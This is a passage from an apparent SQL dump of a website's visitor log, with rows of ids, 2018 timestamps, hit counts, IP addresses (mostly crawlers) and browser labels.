33139826,1,1,0,0,'54.36.149.69','other'),(280573,1533139964,2,2,0,0,'91.196.178.44','chrome'),(280574,1533140235,1,0,1,0,'66.249.66.61',''),(280575,1533140420,1,1,0,0,'54.36.148.38','other'),(280576,1533140444,1,1,0,0,'54.36.148.58','other'),(280577,1533140577,1,1,0,0,'54.36.148.192','other'),(280578,1533140792,1,1,0,0,'54.36.148.224','other'),(280579,1533140865,1,1,0,0,'54.36.148.132','other'),(280580,1533140950,1,1,0,0,'188.230.43.254','other'),(280581,1533141107,1,1,0,0,'54.36.148.134','other'),(280582,1533141295,1,1,0,0,'54.36.148.39','other'),(280583,1533141325,1,1,0,0,'54.36.149.92','other'),(280584,1533141329,1,1,0,0,'54.36.148.227','other'),(280585,1533141385,1,1,0,0,'54.36.148.191','other'),(280586,1533141578,2,2,0,0,'54.36.148.16','other'),(280587,1533141644,1,1,0,0,'46.149.56.4','chrome'),(280588,1533141695,1,1,0,0,'54.36.148.145','other'),(280589,1533141846,1,1,0,0,'54.36.149.9','other'),(280590,1533141938,1,1,0,0,'54.36.149.45','other'),(280591,1533142118,1,1,0,0,'54.36.148.55','other'),(280592,1533142131,1,1,0,0,'54.36.148.231','other'),(280593,1533142470,1,1,0,0,'216.244.66.241','other'),(280594,1533142478,1,1,0,0,'54.36.148.88','other'),(280595,1533143026,1,1,0,0,'46.133.14.164','other'),(280596,1533143090,1,1,0,0,'54.36.149.12','other'),(280597,1533143103,2,2,0,0,'144.76.96.236','other'),(280598,1533143327,1,1,0,0,'163.172.4.153','chrome'),(280599,1533143342,1,1,0,0,'188.230.43.254','other'),(280600,1533143363,1,1,0,0,'54.36.148.15','other'),(280601,1533143395,1,1,0,0,'46.17.203.253','chrome'),(280602,1533143854,1,1,0,0,'54.36.149.82','other'),(280603,1533143948,1,1,0,0,'54.36.148.210','other'),(280604,1533144105,1,1,0,0,'54.36.148.100','other'),(280605,1533144171,1,1,0,0,'54.36.148.29','other'),(280606,1533144243,1,1,0,0,'37.9.113.138','other'),(280607,1533144415,1,1,0,0,'54.36.148.246','other'),(280608,1533144551,1,1,0,0,'141.8.142.74','other'),(280609,1533144599,1,1,0,0,'95.163.255.106','other'),(280610,1533144823,1,1,0,0,'54.36.149.4','other'),(280611,1533144949,1,1,0,0,'54.36.148.137','other'),(280612,1533144980,1,1,0,0,'216.244.66.241','other'),(280613,1533145033,1,1,0,0,'54.36.148.10','other'),(280614,1533145362,1,1,0,0,'54.36.148.199','other'),(280615,1533146083,1,1,0,0,'54.36.148.221','other'),(280616,1533146087,1,1,0,0,'46.63.67.138','chrome'),(280617,1533146280,1,1,0,0,'54.36.148.229','other'),(280618,1533146556,1,1,0,0,'54.36.148.187','other'),(280619,1533146671,1,1,0,0,'54.36.149.50','other'),(280620,1533146746,1,1,0,0,'54.36.149.93','other'),(280621,1533146901,1,1,0,0,'54.36.148.16','other'),(280622,1533146927,1,1,0,0,'54.36.149.51','other'),(280623,1533146989,1,1,0,0,'54.36.148.223','other'),(280624,1533147059,2,2,0,0,'216.244.66.241','other'),(280625,1533147137,1,1,0,0,'54.36.148.237','other'),(280626,1533147422,1,1,0,0,'54.36.149.2','other'),(280627,1533147424,1,1,0,0,'8.29.198.27','other'),(280628,1533147435,1,1,0,0,'54.36.149.73','other'),(280629,1533147523,1,1,0,0,'54.36.148.19','other'),(280630,1533147570,1,1,0,0,'54.36.149.86','other'),(280631,1533147694,1,1,0,0,'54.36.148.185','other'),(280632,1533147723,1,1,0,0,'54.36.149.4','other'),(280633,1533147830,1,1,0,0,'54.36.148.150','other'),(280634,1533147844,1,1,0,0,'54.36.148.187','other'),(280635,1533148000,1,1,0,0,'54.36.148.126','other'),(280636,1533148085,1,1,0,0,'54.36.149.35','other'),(280637,1533148576,1,1,0,0,'54.36.149.55','other'),(280638,1533148891,1,1,0,0,'54.36.149.81','other'),(280639,1533148994,1,1,0,0,'8.29.198.26','other'),(280640,1533149101,1,1,0,0,'54.36.148.89','other'),(280641,1533149146,1,1,0,0,'54.36.148.17','other'),(280642,1533149372,1,1,0,0,'54.36.149.99','other'),(280643,1533149412,1,1,0,0,'54.36.148.174','other'),(280644,1533149812,1,1,0,0,'178.154.171.88','other'),(280645,1533149878,1,1,0,0,'216.244.66.241','other'),(280646,1533150192,1,1,0,0,'54.36.149.4','other'),(280647,1533150299,1,1,0,0,'207.46.13.39','other'),(280648,1533150490,1,1,0,0,'54.36.148.169','other'),(280649,1533150624,1,1,0,0,'54.36.149.61','other'),(280650,1533151037,1,1,0,0,'54.36.149.44','other'),(280651,1533151046,1,1,0,0,'54.36.148.220','other'),(280652,1533151104,1,1,0,0,'54.36.148.212','other'),(280653,1533151341,1,1,0,0,'54.36.149.50','other'),(280654,1533151852,1,1,0,0,'54.36.149.4','other'),(280655,1533152004,1,1,0,0,'54.36.148.66','other'),(280656,1533152088,1,1,0,0,'54.36.149.0','other'),(280657,1533152217,1,1,0,0,'54.36.148.250','other'),(280658,1533152371,1,1,0,0,'54.36.148.163','other'),(280659,1533152500,1,1,0,0,'141.8.142.74','other'),(280660,1533152776,3,3,0,0,'216.244.66.241','other'),(280661,1533152991,1,1,0,0,'54.36.148.162','other'),(280662,1533153250,1,1,0,0,'54.36.148.245','other'),(280663,1533153289,1,1,0,0,'54.36.148.136','other'),(280664,1533153797,1,1,0,0,'54.36.148.252','other'),(280665,1533153847,1,1,0,0,'54.36.148.255','other'),(280666,1533153980,1,1,0,0,'54.36.149.67','other'),(280667,1533154034,1,1,0,0,'54.36.148.85','other'),(280668,1533154244,1,1,0,0,'54.36.148.209','other'),(280669,1533154393,1,1,0,0,'54.36.148.176','other'),(280670,1533154457,1,1,0,0,'66.249.66.59','chrome'),(280671,1533154486,1,1,0,0,'54.36.149.1','other'),(280672,1533154528,1,1,0,0,'54.36.148.228','other'),(280673,1533154871,1,1,0,0,'54.36.149.48','other'),(280674,1533154960,1,1,0,0,'54.36.148.36','other'),(280675,1533155000,2,2,0,0,'54.36.148.112','other'),(280676,1533155046,1,1,0,0,'54.36.148.127','other'),(280677,1533155299,3,3,0,0,'216.244.66.241','other'),(280678,1533155331,1,1,0,0,'54.36.148.69','other'),(280679,1533155344,1,1,0,0,'54.36.148.236','other'),(280680,1533155412,1,1,0,0,'54.36.149.11','other'),(280681,1533155452,1,1,0,0,'54.36.148.179','other'),(280682,1533155541,1,1,0,0,'54.36.149.55','other'),(280683,1533155686,1,1,0,0,'54.36.149.17','other'),(280684,1533155826,1,1,0,0,'54.36.148.10','other'),(280685,1533155877,1,1,0,0,'54.36.148.164','other'),(280686,1533155940,1,0,1,0,'66.249.66.156',''),(280687,1533156007,1,1,0,0,'66.249.66.157','chrome'),(280688,1533156052,1,1,0,0,'178.154.171.88','other'),(280689,1533156113,1,1,0,0,'54.36.148.89','other'),(280690,1533156195,1,1,0,0,'54.36.148.227','other'),(280691,1533156300,1,1,0,0,'54.36.148.65','other'),(280692,1533156596,1,1,0,0,'54.36.148.157','other'),(280693,1533156688,1,0,1,0,'66.249.66.61',''),(280694,1533156704,1,0,1,0,'66.249.66.155',''),(280695,1533156746,1,1,0,0,'54.36.148.28','other'),(280696,1533156763,1,1,0,0,'54.36.149.105','other'),(280697,1533156774,1,1,0,0,'54.36.148.38','other'),(280698,1533156995,1,1,0,0,'54.36.149.0','other'),(280699,1533157069,1,1,0,0,'178.154.171.88','other'),(280700,1533157311,1,1,0,0,'54.36.149.4','other'),(280701,1533157361,1,1,0,0,'5.45.207.83','other'),(280702,1533157451,1,1,0,0,'54.36.148.249','other'),(280703,1533157502,1,1,0,0,'54.36.148.235','other'),(280704,1533157529,1,1,0,0,'54.36.149.97','other'),(280705,1533157720,1,1,0,0,'54.36.148.68','other'),(280706,1533157816,1,1,0,0,'141.8.142.74','other'),(280707,1533157874,1,0,1,0,'66.249.66.61',''),(280708,1533157880,1,1,0,0,'54.36.148.230','other'),(280709,1533157963,1,1,0,0,'216.244.66.241','other'),(280710,1533158000,1,1,0,0,'54.36.148.101','other'),(280711,1533158006,1,1,0,0,'54.36.149.12','other'),(280712,1533158064,1,1,0,0,'54.36.148.84','other'),(280713,1533158130,2,0,2,0,'66.249.66.155',''),(280714,1533158274,1,1,0,0,'54.36.148.194','other'),(280715,1533158291,1,1,0,0,'8.29.198.27','other'),(280716,1533158375,1,1,0,0,'54.36.148.245','other'),(280717,1533158405,1,1,0,0,'54.36.148.198','other'),(280718,1533158454,1,1,0,0,'54.36.148.112','other'),(280719,1533158456,1,1,0,0,'54.36.148.20','other'),(280720,1533158517,1,1,0,0,'54.36.148.255','other'),(280721,1533158608,1,1,0,0,'54.36.149.63','other'),(280722,1533158967,1,1,0,0,'54.36.148.37','other'),(280723,1533158978,1,1,0,0,'54.36.148.202','other'),(280724,1533159009,1,1,0,0,'54.36.148.173','other'),(280725,1533159134,1,1,0,0,'54.36.148.246','other'),(280726,1533159476,2,0,2,0,'66.249.66.155',''),(280727,1533159555,1,0,1,0,'66.249.66.157',''),(280728,1533159785,1,0,1,0,'66.249.66.156',''),(280729,1533159870,1,1,0,0,'8.29.198.25','other'),(280730,1533160096,1,1,0,0,'54.36.148.218','other'),(280731,1533160146,1,1,0,0,'54.36.149.47','other'),(280732,1533160250,1,1,0,0,'54.36.148.104','other'),(280733,1533160308,1,1,0,0,'54.36.149.97','other'),(280734,1533160426,1,1,0,0,'54.36.148.252','other'),(280735,1533160446,1,1,0,0,'54.36.148.167','other'),(280736,1533160456,1,1,0,0,'13.66.185.4','other'),(280737,1533160500,1,1,0,0,'216.244.66.241','other'),(280738,1533160523,1,1,0,0,'54.36.148.136','other'),(280739,1533160652,2,2,0,0,'54.36.148.163','other'),(280740,1533160746,1,1,0,0,'54.36.148.99','other'),(280741,1533160906,1,1,0,0,'37.9.113.82','other'),(280742,1533160909,1,1,0,0,'178.154.171.60','other'),(280743,1533160933,1,1,0,0,'54.36.148.127','other'),(280744,1533161074,1,1,0,0,'54.36.148.62','other'),(280745,1533161135,1,1,0,0,'54.36.148.14','other'),(280746,1533161175,1,1,0,0,'54.36.149.59','other'),(280747,1533161197,2,0,2,0,'66.249.66.155',''),(280748,1533161248,1,1,0,0,'54.36.148.113','other'),(280749,1533161310,1,1,0,0,'54.36.149.29','other'),(280750,1533161311,1,1,0,0,'54.36.148.45','other'),(280751,1533161318,1,1,0,0,'54.36.149.82','other'),(280752,1533161391,1,1,0,0,'54.36.149.104','other'),(280753,1533161393,1,1,0,0,'109.86.71.21','chrome'),(280754,1533161560,1,1,0,0,'54.36.149.48','other'),(280755,1533161629,1,1,0,0,'54.36.148.250','other'),(280756,1533162207,1,1,0,0,'54.36.148.240','other'),(280757,1533162221,1,1,0,0,'54.36.148.222','other'),(280758,1533162236,1,1,0,0,'54.36.148.167','other'),(280759,1533162306,1,1,0,0,'54.36.148.236','other'),(280760,1533162337,1,1,0,0,'54.36.148.76','other'),(280761,1533162395,2,2,0,0,'141.8.142.74','other'),(280762,1533162400,2,0,2,0,'66.249.66.157',''),(280763,1533162444,3,0,3,0,'66.249.66.156',''),(280764,1533162461,1,1,0,0,'54.36.149.89','other'),(280765,1533162500,1,1,0,0,'87.250.224.46','other'),(280766,1533162541,1,1,0,0,'95.108.213.24','other'),(280767,1533162556,1,1,0,0,'54.36.149.59','other'),(280768,1533162667,1,1,0,0,'54.36.148.109','other'),(280769,1533162676,1,1,0,0,'54.36.148.220','other'),(280770,1533162695,1,1,0,0,'54.36.148.255','other'),(280771,1533163042,1,1,0,0,'54.36.148.13','other'),(280772,1533163050,1,1,0,0,'54.36.148.186','other'),(280773,1533163319,1,1,0,0,'54.36.148.21','other'),(280774,1533163562,1,1,0,0,'54.36.148.199','other'),(280775,1533163805,1,1,0,0,'54.36.148.126','other'),(280776,1533164004,1,1,0,0,'54.36.148.108','other'),(280777,1533164036,1,0,1,0,'66.249.66.157',''),(280778,1533164124,1,1,0,0,'54.36.149.90','other'),(280779,1533164148,1,1,0,0,'54.36.148.55','other'),(280780,1533164171,1,1,0,0,'54.36.149.67','other'),(280781,1533164182,1,1,0,0,'141.8.142.74','other'),(280782,1533164257,1,1,0,0,'54.36.149.93','other'),(280783,1533164431,1,1,0,0,'54.36.149.91','other'),(280784,1533164470,1,1,0,0,'54.36.148.53','other'),(280785,1533164554,1,1,0,0,'54.36.148.154','other'),(280786,1533164580,2,2,0,0,'54.36.148.52','other'),(280787,1533164603,1,1,0,0,'54.36.149.19','other'),(280788,1533164880,1,1,0,0,'54.36.148.161','other'),(280789,1533164930,5,5,0,0,'216.244.66.241','other'),(280790,1533164938,1,1,0,0,'54.36.149.21','other'),(280791,1533165081,1,1,0,0,'54.36.149.24','other'),(280792,1533165172,3,0,3,0,'66.249.66.155',''),(280793,1533165244,3,1,2,0,'66.249.66.156',''),(280794,1533165419,1,1,0,0,'95.163.255.99','other'),(280795,1533165500,1,1,0,0,'54.36.148.25','other'),(280796,1533165856,1,1,0,0,'54.36.149.106','other'),(280797,1533166089,1,1,0,0,'54.36.148.32','other'),(280798,1533166109,1,0,1,0,'66.249.66.155',''),(280799,1533166227,2,2,0,0,'91.209.11.236','other'),(280800,1533166324,2,0,2,0,'66.249.66.156',''),(280801,1533166325,1,1,0,0,'54.36.148.232','other'),(280802,1533166406,1,1,0,0,'54.36.148.234','other'),(280803,1533166419,1,1,0,0,'54.36.149.68','other'),(280804,1533166438,1,1,0,0,'54.36.148.157','other'),(280805,1533166481,1,0,1,0,'66.249.66.157',''),(280806,1533166538,1,1,0,0,'54.36.148.31','other'),(280807,1533166600,1,1,0,0,'54.36.148.211','other'),(280808,1533166720,7,7,0,0,'5.9.156.30','other'),(280809,1533166809,1,1,0,0,'54.36.149.23','other'),(280810,1533166864,1,1,0,0,'54.36.148.23','other'),(280811,1533166907,1,1,0,0,'54.36.149.9','other'),(280812,1533167025,1,1,0,0,'54.36.148.88','other'),(280813,1533167093,1,0,1,0,'66.249.66.59',''),(280814,1533167151,1,1,0,0,'54.36.148.147','other'),(280815,1533167641,1,0,1,0,'66.249.66.156',''),(280816,1533167795,1,1,0,0,'54.36.148.12','other'),(280817,1533167808,1,1,0,0,'54.36.148.48','other'),(280818,1533167934,2,2,0,0,'216.244.66.241','other'),(280819,1533167936,1,1,0,0,'178.154.171.88','other'),(280820,1533168062,1,1,0,0,'54.36.148.112','other'),(280821,1533168216,1,1,0,0,'54.36.148.47','other'),(280822,1533168231,1,0,1,0,'66.249.66.155',''),(280823,1533168649,1,1,0,0,'54.36.148.196','other'),(280824,1533168791,1,1,0,0,'141.8.142.74','other'),(280825,1533168804,1,1,0,0,'87.250.224.46','other'),(280826,1533168879,1,1,0,0,'54.36.149.100','other'),(280827,1533168887,1,1,0,0,'54.36.148.132','other'),(280828,1533169039,1,1,0,0,'54.36.148.142','other'),(280829,1533169125,1,1,0,0,'54.36.148.168','other'),(280831,1533169155,1,1,0,0,'8.29.198.25','other'),(280832,1533169298,1,1,0,0,'54.36.149.22','other'),(280833,1533169404,1,1,0,0,'54.36.148.20','other'),(280834,1533169610,1,0,1,0,'66.249.66.155',''),(280835,1533169807,1,1,0,0,'95.163.255.174','other'),(280836,1533169947,1,1,0,0,'54.36.148.95','other'),(280837,1533170113,1,1,0,0,'54.36.148.201','other'),(280838,1533170268,1,1,0,0,'54.36.149.8','other'),(280839,1533170321,1,1,0,0,'54.36.149.81','other'),(280840,1533170415,1,1,0,0,'207.46.13.38','other'),(280841,1533170733,1,1,0,0,'8.29.198.26','other'),(280842,1533170795,1,1,0,0,'54.36.148.35','other'),(280843,1533170919,1,1,0,0,'54.36.148.22','other'),(280844,1533171020,1,1,0,0,'54.36.148.237','other'),(280845,1533171189,1,1,0,0,'54.36.148.255','other'),(280846,1533171225,1,1,0,0,'54.36.148.198','other'),(280847,1533171281,1,1,0,0,'95.163.255.94','other'),(280848,1533171346,1,1,0,0,'54.36.148.250','other'),(280849,1533171414,2,0,2,0,'66.249.66.157',''),(280850,1533171676,1,1,0,0,'54.36.148.171','other'),(280851,1533171693,1,1,0,0,'54.36.149.82','other'),(280852,1533171746,1,0,1,0,'66.249.66.59',''),(280853,1533171926,1,1,0,0,'54.36.148.48','other'),(280854,1533171936,1,0,1,0,'66.249.66.155',''),(280855,1533171983,1,1,0,0,'54.36.148.195','other'),(280856,1533172182,1,1,0,0,'178.154.171.88','other'),(280857,1533172426,1,1,0,0,'54.36.148.92','other'),(280858,1533172472,1,1,0,0,'54.36.149.14','other'),(280859,1533172495,1,1,0,0,'54.36.148.174','other'),(280860,1533172570,1,1,0,0,'95.163.255.160','other'),(280861,1533172697,1,1,0,0,'54.36.148.64','other'),(280862,1533172776,1,1,0,0,'54.36.148.13','other'),(280863,1533172849,1,1,0,0,'54.36.148.65','other'),(280864,1533173501,1,1,0,0,'54.36.149.100','other'),(280865,1533173966,1,1,0,0,'54.36.148.247','other'),(280866,1533174023,1,1,0,0,'54.36.149.17','other'),(280867,1533174160,1,1,0,0,'54.36.149.55','other'),(280868,1533174165,1,1,0,0,'91.209.11.236','other'),(280869,1533174235,1,1,0,0,'54.36.148.213','other'),(280870,1533174255,1,1,0,0,'54.36.149.23','other'),(280871,1533174329,1,1,0,0,'54.36.149.102','other'),(280872,1533174409,1,1,0,0,'54.36.148.26','other'),(280873,1533174487,1,1,0,0,'54.36.148.165','other'),(280874,1533174623,2,0,2,0,'66.249.66.59',''),(280875,1533174682,1,1,0,0,'54.36.148.157','other'),(280876,1533175011,1,1,0,0,'54.36.148.42','other'),(280877,1533175224,1,0,1,0,'66.249.66.155',''),(280878,1533175238,1,1,0,0,'52.34.24.33','chrome'),(280879,1533175309,2,2,0,0,'66.249.66.155','chrome'),(280880,1533175499,1,1,0,0,'54.36.148.242','other'),(280881,1533175527,3,3,0,0,'216.244.66.241','other'),(280882,1533175646,1,0,1,0,'66.249.66.59',''),(280883,1533175658,1,1,0,0,'54.36.149.63','other'),(280884,1533175743,1,1,0,0,'54.36.148.232','other'),(280885,1533175805,1,1,0,0,'54.36.148.35','other'),(280886,1533175899,1,1,0,0,'54.36.148.119','other'),(280887,1533176034,1,1,0,0,'54.36.148.127','other'),(280888,1533176241,1,1,0,0,'54.36.148.55','other'),(280889,1533176446,1,1,0,0,'212.83.3.182','firefox'),(280890,1533176482,1,1,0,0,'54.36.148.208','other'),(280891,1533176563,1,1,0,0,'54.36.148.196','other'),(280892,1533176713,1,1,0,0,'54.36.149.82','other'),(280893,1533176757,1,1,0,0,'54.36.148.74','other'),(280894,1533176820,1,1,0,0,'54.36.148.83','other'),(280895,1533177242,1,1,0,0,'54.36.148.160','other'),(280896,1533177527,1,1,0,0,'54.36.149.76','other'),(280897,1533177688,1,1,0,0,'54.36.148.125','other'),(280898,1533177819,1,1,0,0,'54.36.149.8','other'),(280899,1533178617,1,1,0,0,'54.36.149.22','other'),(280900,1533178650,1,1,0,0,'54.36.149.62','other'),(280901,1533178856,1,1,0,0,'54.36.149.101','other'),(280902,1533178966,1,1,0,0,'54.36.148.84','other'),(280903,1533179178,2,2,0,0,'92.113.189.235','chrome'),(280904,1533179216,1,1,0,0,'54.36.149.24','other'),(280905,1533179320,1,1,0,0,'95.181.179.219','chrome'),(280906,1533179546,1,1,0,0,'178.154.171.88','other'),(280907,1533179627,1,0,1,0,'66.249.66.156',''),(280908,1533179637,1,1,0,0,'54.36.149.22','other'),(280909,1533179645,2,0,2,0,'66.249.66.155',''),(280910,1533179904,1,1,0,0,'91.196.178.130','chrome'),(280911,1533180018,1,1,0,0,'8.29.198.26','other'),(280912,1533180146,1,1,0,0,'54.36.148.133','other'),(280913,1533180204,1,1,0,0,'54.36.148.12','other'),(280914,1533180321,1,1,0,0,'54.36.149.69','other'),(280915,1533180499,4,4,0,0,'216.244.66.241','other'),(280916,1533180514,1,1,0,0,'54.36.148.242','other'),(280917,1533180769,1,1,0,0,'54.36.149.53','other'),(280918,1533180795,1,1,0,0,'54.36.148.43','other'),(280919,1533180921,1,1,0,0,'54.36.148.243','other'),(280920,1533181074,1,1,0,0,'54.36.148.159','other'),(280921,1533181442,1,1,0,0,'54.36.148.140','other'),(280922,1533181522,1,1,0,0,'54.36.148.83','other'),(280923,1533181595,1,1,0,0,'8.29.198.25','other'),(280924,1533181768,1,1,0,0,'54.36.149.24','other'),(280925,1533181850,1,1,0,0,'54.36.149.54','other'),(280926,1533181858,1,1,0,0,'54.36.148.131','other'),(280927,1533181867,1,1,0,0,'54.36.148.144','other'),(280928,1533181903,1,1,0,0,'54.36.149.55','other'),(280929,1533181911,1,1,0,0,'54.36.149.80','other'),(280930,1533181985,1,1,0,0,'54.36.148.42','other'),(280931,1533182083,2,0,2,0,'66.249.66.156',''),(280932,1533182199,1,1,0,0,'66.249.66.155','chrome'),(280933,1533182249,1,1,0,0,'54.36.149.81','other'),(280934,1533182382,1,1,0,0,'54.36.149.36','other'),(280935,1533182448,1,1,0,0,'54.36.148.129','other'),(280936,1533182616,1,1,0,0,'54.36.148.93','other'),(280937,1533182646,1,1,0,0,'141.8.132.22','other'),(280938,1533182744,1,1,0,0,'54.36.148.203','other'),(280939,1533182753,1,1,0,0,'54.36.148.153','other'),(280940,1533182762,1,1,0,0,'54.36.148.200','other'),(280941,1533182883,1,1,0,0,'54.36.149.71','other'),(280942,1533182999,1,1,0,0,'207.46.13.38','other'),(280943,1533183086,1,1,0,0,'54.36.148.236','other'),(280944,1533183161,1,1,0,0,'216.244.66.241','other'),(280945,1533183229,1,1,0,0,'54.36.148.120','other'),(280946,1533183342,1,1,0,0,'54.36.148.156','other'),(280947,1533183348,1,1,0,0,'54.36.148.150','other'),(280948,1533183362,1,1,0,0,'54.36.149.84','other'),(280949,1533183380,1,1,0,0,'54.36.148.116','other'),(280950,1533183548,1,1,0,0,'54.36.149.9','other'),(280951,1533183656,1,0,1,0,'66.249.66.157',''),(280952,1533183686,1,1,0,0,'54.36.149.85','other'),(280953,1533184362,1,1,0,0,'54.36.149.91','other'),(280954,1533184508,1,1,0,0,'54.36.148.30','other'),(280955,1533184724,2,0,2,0,'66.249.66.156',''),(280956,1533185045,1,1,0,0,'54.36.149.78','other'),(280957,1533185079,1,1,0,0,'54.36.148.66','other'),(280958,1533185196,1,1,0,0,'54.36.149.44','other'),(280959,1533185353,3,3,0,0,'216.244.66.241','other'),(280960,1533185475,1,1,0,0,'54.36.148.23','other'),(280961,1533185521,26,26,0,0,'5.9.140.242','other'),(280962,1533185727,1,1,0,0,'54.36.149.82','other'),(280963,1533185780,1,1,0,0,'54.36.148.188','other'),(280964,1533185858,1,1,0,0,'54.36.149.3','other'),(280965,1533185878,1,1,0,0,'54.36.149.39','other'),(280966,1533186280,1,1,0,0,'91.196.178.133','firefox'),(280967,1533186287,1,1,0,0,'54.36.148.88','other'),(280968,1533186414,1,1,0,0,'54.36.148.126','other'),(280969,1533186469,1,1,0,0,'54.36.149.13','other'),(280970,1533186836,1,1,0,0,'66.249.66.157','chrome'),(280971,1533186935,1,1,0,0,'54.36.148.218','other'),(280972,1533187011,1,1,0,0,'54.36.149.70','other'),(280973,1533187091,1,0,1,0,'66.249.66.59',''),(280974,1533187155,3,3,0,0,'78.46.176.21','other'),(280975,1533187158,1,0,1,0,'66.249.66.156',''),(280976,1533187258,1,1,0,0,'54.36.148.104','other'),(280977,1533187468,1,1,0,0,'54.36.148.238','other'),(280978,1533187498,1,1,0,0,'54.36.149.61','other'),(280979,1533187579,1,1,0,0,'54.36.149.94','other'),(280980,1533187663,1,1,0,0,'54.36.149.68','other'),(280981,1533187732,1,1,0,0,'54.36.149.37','other'),(280982,1533187769,1,1,0,0,'66.249.66.156','chrome'),(280983,1533187807,1,1,0,0,'54.36.148.214','other'),(280984,1533188241,2,2,0,0,'216.244.66.241','other'),(280985,1533188299,1,1,0,0,'66.249.83.59','chrome'),(280986,1533188301,2,2,0,0,'66.249.83.57','chrome'),(280987,1533188346,1,1,0,0,'54.36.148.115','other'),(280988,1533188348,1,1,0,0,'54.36.148.208','other'),(280989,1533188395,1,1,0,0,'54.36.148.101','other'),(280990,1533188668,2,2,0,0,'178.154.171.88','other'),(280991,1533189020,2,0,2,0,'66.249.66.155',''),(280992,1533189074,3,0,3,0,'66.249.66.156',''),(280993,1533189373,1,1,0,0,'54.36.148.150','other'),(280994,1533189389,1,0,1,0,'66.249.66.157',''),(280995,1533189717,1,1,0,0,'54.36.148.135','other'),(280996,1533189919,1,1,0,0,'54.36.148.98','other'),(280997,1533190028,1,1,0,0,'207.46.13.38','other'),(280998,1533190163,1,1,0,0,'54.36.149.93','other'),(280999,1533190443,1,1,0,0,'54.36.148.84','other'),(281000,1533190738,1,1,0,0,'216.244.66.241','other'),(281001,1533190863,1,1,0,0,'8.29.198.25','other'),(281002,1533190953,1,1,0,0,'54.36.148.20','other'),(281003,1533191184,1,1,0,0,'54.36.148.189','other'),(281004,1533191361,1,1,0,0,'54.36.148.170','other'),(281005,1533191439,1,1,0,0,'54.36.148.154','other'),(281006,1533191486,2,0,2,0,'66.249.66.155',''),(281007,1533191498,1,1,0,0,'54.36.149.72','other'),(281008,1533191515,1,0,1,0,'66.249.66.156',''),(281009,1533191599,1,1,0,0,'54.36.148.89','other'),(281010,1533191719,1,1,0,0,'46.211.126.20','other'),(281011,1533191813,1,1,0,0,'54.36.149.51','other'),(281012,1533191831,1,1,0,0,'54.36.148.152','other'),(281013,1533192163,1,1,0,0,'95.133.194.181','chrome'),(281014,1533192209,1,1,0,0,'157.55.39.210','other'),(281015,1533192309,1,1,0,0,'91.196.178.80','chrome'),(281016,1533192339,1,1,0,0,'54.36.149.66','other'),(281017,1533192451,1,1,0,0,'8.29.198.27','other'),(281018,1533192476,1,1,0,0,'54.36.149.92','other'),(281019,1533192481,1,1,0,0,'54.36.148.191','other'),(281020,1533192910,1,1,0,0,'54.36.148.198','other'),(281021,1533192930,1,1,0,0,'54.36.148.23','other'),(281022,1533192962,1,0,1,0,'66.249.66.156',''),(281023,1533193012,1,1,0,0,'51.255.65.46','other'),(281024,1533193102,4,4,0,0,'216.244.66.241','other'),(281025,1533193106,1,1,0,0,'54.36.148.178','other'),(281026,1533193127,1,1,0,0,'54.36.149.31','other'),(281027,1533193162,1,1,0,0,'54.36.148.148','other'),(281028,1533193171,1,1,0,0,'54.36.148.163','other'),(281029,1533193174,1,1,0,0,'66.249.66.156','chrome'),(281030,1533193332,1,1,0,0,'54.36.148.158','other'),(281031,1533193451,1,1,0,0,'54.36.148.59','other'),(281032,1533193706,1,1,0,0,'91.196.178.71','firefox'),(281033,1533193713,1,1,0,0,'54.36.148.221','other'),(281034,1533193730,1,1,0,0,'54.36.149.39','other'),(281035,1533193761,2,2,0,0,'162.210.196.129','other'),(281036,1533193775,1,1,0,0,'54.36.148.79','other'),(281037,1533193852,1,1,0,0,'180.76.15.6','other'),(281038,1533193918,1,1,0,0,'54.36.149.26','other'),(281039,1533193954,1,1,0,0,'178.154.171.88','other'),(281040,1533194004,1,1,0,0,'54.36.148.58','other'),(281041,1533194091,1,1,0,0,'54.36.148.233','other'),(281042,1533194165,1,1,0,0,'54.36.149.102','other'),(281043,1533194287,2,2,0,0,'91.196.178.102','chrome'),(281044,1533194308,5,0,5,0,'66.249.66.155',''),(281045,1533194341,1,0,1,0,'66.249.66.59',''),(281046,1533194355,2,0,2,0,'66.249.66.57',''),(281047,1533194360,1,1,0,0,'54.36.148.155','other'),(281048,1533194418,1,1,0,0,'54.36.148.185','other'),(281049,1533194480,1,1,0,0,'54.36.148.128','other'),(281050,1533194600,1,1,0,0,'66.249.66.59','chrome'),(281051,1533194623,1,1,0,0,'66.249.66.156','chrome'),(281052,1533194652,1,1,0,0,'54.36.149.37','other'),(281053,1533194713,1,1,0,0,'54.36.148.38','other'),(281054,1533194781,1,0,1,0,'66.249.66.157',''),(281055,1533194996,1,1,0,0,'54.36.148.255','other'),(281056,1533195123,1,1,0,0,'54.36.148.51','other'),(281057,1533195132,1,1,0,0,'54.36.148.74','other'),(281058,1533195338,1,1,0,0,'54.36.148.33','other'),(281059,1533195340,1,1,0,0,'54.36.148.237','other'),(281060,1533195342,1,1,0,0,'54.36.148.116','other'),(281061,1533195415,1,1,0,0,'54.36.149.84','other'),(281062,1533195511,1,1,0,0,'54.36.148.121','other'),(281063,1533195590,1,1,0,0,'54.36.148.29','other'),(281064,1533195602,1,1,0,0,'54.36.148.253','other'),(281065,1533195785,1,1,0,0,'54.36.148.149','other'),(281066,1533195863,1,1,0,0,'207.46.13.39','other'),(281067,1533195984,1,1,0,0,'54.36.149.101','other'),(281068,1533196233,2,2,0,0,'216.244.66.241','other'),(281069,1533196274,1,1,0,0,'54.36.149.5','other'),(281070,1533196326,1,0,1,0,'66.249.66.157',''),(281071,1533196350,1,1,0,0,'54.36.148.241','other'),(281072,1533196863,1,1,0,0,'54.36.148.68','other'),(281073,1533196936,1,0,1,0,'66.249.66.156',''),(281074,1533197060,1,1,0,0,'54.36.149.73','other'),(281075,1533197205,3,0,3,0,'66.249.66.155',''),(281076,1533197251,2,1,1,0,'66.249.66.156',''),(281077,1533197256,1,0,1,0,'66.249.66.59',''),(281078,1533197358,1,0,1,0,'66.249.66.57',''),(281079,1533197364,1,0,1,0,'66.249.66.157',''),(281080,1533197367,1,1,0,0,'54.36.148.83','other'),(281081,1533197568,1,1,0,0,'54.36.148.228','other'),(281082,1533197627,1,1,0,0,'54.36.148.16','other'),(281083,1533197649,1,1,0,0,'54.36.149.61','other'),(281084,1533197650,1,1,0,0,'95.163.255.92','other'),(281085,1533197863,1,1,0,0,'54.36.148.114','other'),(281086,1533197884,1,1,0,0,'54.36.148.11','other'),(281087,1533198058,1,1,0,0,'54.36.148.58','other'),(281088,1533198175,1,1,0,0,'95.133.248.139','firefox'),(281089,1533198305,1,1,0,0,'54.36.149.97','other'),(281090,1533198410